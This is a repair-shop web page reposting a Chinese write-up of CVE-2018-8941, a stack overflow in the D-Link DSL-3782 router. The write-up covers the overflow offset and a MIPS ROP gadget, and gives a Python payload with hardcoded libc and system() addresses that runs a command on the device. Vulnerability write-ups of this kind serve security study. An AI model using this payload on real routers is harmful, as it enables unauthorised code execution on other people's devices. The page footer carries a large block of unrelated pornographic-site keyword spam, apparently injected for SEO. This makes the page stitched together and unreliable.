錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
D-Link DSL-3782 代碼路由器漏洞分析CVE-2018-8941 遠程代碼執行

作者: 佚名  日期:2018-05-23 14:25:20   來源: 本站整理

一. 漏洞概述

CVE-2018-8941 D-Link DSL-3782 代碼執行 

友訊科技股份有限公司成立于1986年,專注于電腦網路設備的設計開發,并自創「D-Link」品牌,行銷全球。

此漏洞位于 D-Link DSL-3782路由器,授權用戶可以遠程代碼執行

參考信息:https://github.com/SECFORCE/CVE-2018-8941#cve-2018-8941-d-link-dsl-3782-code-execution-proof-of-concept

漏洞固件版本:DSL-3782_A1_EU_1.01_07282016.bin

下載鏈接:

https://eu.dlink.com/cz/cs/products/dsl-3782-wireless-ac1200-dual-band-vdsl-adsl-modem-router#Technical-Specifications

漏洞存在于 “/USEFS/BI/TCAPI”二進制文件中,它被用作Web GUI中“診斷”功能的實現代碼,一個經過身份驗證的用戶可以使用一個長緩沖區作為參數,導致內存損壞。此外,可以重定向程序的流程并執行任意代碼。

 

 

二. 漏洞分析

 

 

2.1 控制eip

 

 

/userfs/bin/tcapi輸入不當的參數會觸發漏洞

 

 

MIPS 大端結構

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

Tcapiset 命令用法如下

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

tcapi set會調用Libtcapi.so.1中的tcapi_set函數

 

 

其中第二個Strcpy拷貝未驗證src的長度,導致棧溢出

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

ra放在-4 ,拷貝的目標地址在- 0×258,0×258-0×4=596,

 

 

Payload=”A”*596+”BBBB”測試一下

 

 

圖片.png

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

Crash的時候,eip為42424242,位置正確,此時s1,s0,s2,s3 可以被控制

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

2.2 構造rop鏈

 

 

貌似還是很友好

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

由于本身文件很小,可能不太好找到合適的godget,看下內存,用了如下的lib文件

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

Libc里面的godget比較多,mips下的rop主要是去找到 move t9,xxx;jalrt9這樣的指令來達到控制執行流程的目的,其中xxx是我們在溢出的時候可以控制的寄存器。此漏洞中我們可以控制s0,s1,s2,s3 寄存器。

 

 

用misprop插件在IDA 搜索godget

 

 

直接搜索從棧中讀取參數到寄存器的godget

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

找到如下的godget,把棧中的參數放到s5,再直接放到a0作為下一個call參數,并把system的地址從s0傳到t9,一個godget搞定

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

現在只差s5 的值了,可以看到s5=sp+0×10,那么在payload中ra的后面16字節后再放我們需要system執行的參數

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

我們的參數需要放到

 

 

構造如下的payload:

#!/usr/bin/envpython  import sys  import struct  libc =0x40868000  s0=struct.pack(">I",0x408C1BB0)#system  s1=struct.pack(">I",0x41414141)#useless  s2=struct.pack(">I",0x43434343)#useless  s3=struct.pack(">I",0x44444444)#useless  ra=struct.pack(">I",0x4087E56C)#godget1  x="A"*580+s0+s1+s2+s3+ra+"x"*16+"ls"

 

 

 

執行后,

 

 

可以在截圖中看到,成功執行了我們的遠程命令“ls“”

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

*本文作者:kczwa1,轉載請注明來自FreeBuf.COM



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 久久久精品天堂无码中文字幕| 久久伊人中文无码| 亚洲av无码专区首页| 日韩精品少妇无码受不了| 午夜福利无码不卡在线观看| 人妻丝袜中文无码av影音先锋专区 | 久久久久亚洲AV无码专区网站| 久久久久久国产精品无码下载| 日韩人妻无码一区二区三区久久 | 亚洲AV人无码综合在线观看 | 久久精品无码免费不卡| 亚洲日韩乱码中文无码蜜桃臀网站 | 亚洲熟妇无码av另类vr影视| 最新亚洲人成无码网www电影| 亚洲成av人片不卡无码久久| 亚洲国产91精品无码专区| 国产爆乳无码一区二区麻豆| 99热门精品一区二区三区无码| 18禁无遮挡无码网站免费| 午夜无码中文字幕在线播放 | 久久久久久国产精品无码超碰 | 人妻少妇偷人精品无码| 狠狠躁天天躁中文字幕无码| 免费无码VA一区二区三区| 亚洲AV无码一区二区三区电影| 国产成人无码av| 午夜无码熟熟妇丰满人妻| YY111111少妇无码理论片| 色综合久久久无码中文字幕波多| 永久免费AV无码网站在线观看| 国产AV无码专区亚洲Av| 精品无码一级毛片免费视频观看| 免费无遮挡无码永久视频| 久久久久无码精品国产h动漫 | 无码专区永久免费AV网站| 亚洲中文字幕不卡无码| 18禁超污无遮挡无码免费网站| 东京热加勒比无码少妇| 亚洲啪啪AV无码片| 毛片免费全部播放无码| 亚洲熟妇无码久久精品|